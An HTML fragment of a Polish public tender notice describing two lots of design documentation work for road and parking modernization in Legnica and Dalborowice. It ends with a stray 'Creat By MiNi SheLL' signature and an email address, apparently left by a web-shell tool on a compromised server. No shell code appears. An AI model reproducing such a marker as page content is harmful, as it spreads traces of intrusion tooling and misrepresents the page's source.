<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przedmiot 8 - Wykonanie dokumentacji projektowej dotyczącej modernizacji drogi i miejsc postojowych w granicach działki nr 34/28 i części działki 34/19 obręb Ludwikowo. M. Legnica (teren przy siedzibie AZWRSP w Legnicy wpisany do rejestru zabytków).
W ramach modernizacji drogi i miejsc postojowych nastąpi zmiana nawierzchni z asfaltowej na kostkę granitową i wykonanie nowych krawężników. Dojazd do siedziby oraz miejsca postojowe wynoszą ok. 1800 m2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja projektowa stanowić będzie:
Projekt budowlany  -   5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2  szt.
Przedmiar robót  - 2 szt.
Kosztorys inwestorski -  2 szt.
Wykonawca musi uzyskać dla dokumentacji pozytywną opinię Wojewódzkiego Konserwatora Zabytków w Legnicy.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przedmiot 9 - Prace projektowe na wykonanie dokumentacji projektowej wraz z pełnieniem funkcji nadzoru autorskiego podczas realizacji robót przewidzianych dokumentacją projektową oraz wszelkimi uzgodnieniami i pozwoleniami na wykonanie wewnętrznej drogi dojazdowej w  miejscowości Dalborowice przy ul. Namysłowskiej, dz. nr 416/1, obręb Dalborowice, gmina Dziadowa Kłoda..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do wykonawcy należy również wykonanie:
- przedmiaru robót - 2szt.
- Specyfikacji Technicznej Wykonania i Odbioru Robót - 2szt.
- Kosztorysu Inwestorskiego - 2szt.
- Dokumentacji Projektowej - 5szt. 
Wymienione dokumenty należy przekazać zamawiającemu również w formie elektronicznej 
Projekt powinien obejmować między innymi: 
- usunięcie fragmentu fundamentów po rozebranym budynku
- korytowanie drogi 
- wykonanie warstw podbudowy
- ułożenie nowej nawierzchni

Wykonana dokumentacja projektowa w przedmiotach 1-9 zgodnie z art. 31 ust. 1 ustawy PZP, służyć będzie do opisu przedmiotu zamówienia w przetargu na roboty budowlane mające na celu zrealizowanie zaprojektowanych rozwiązań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com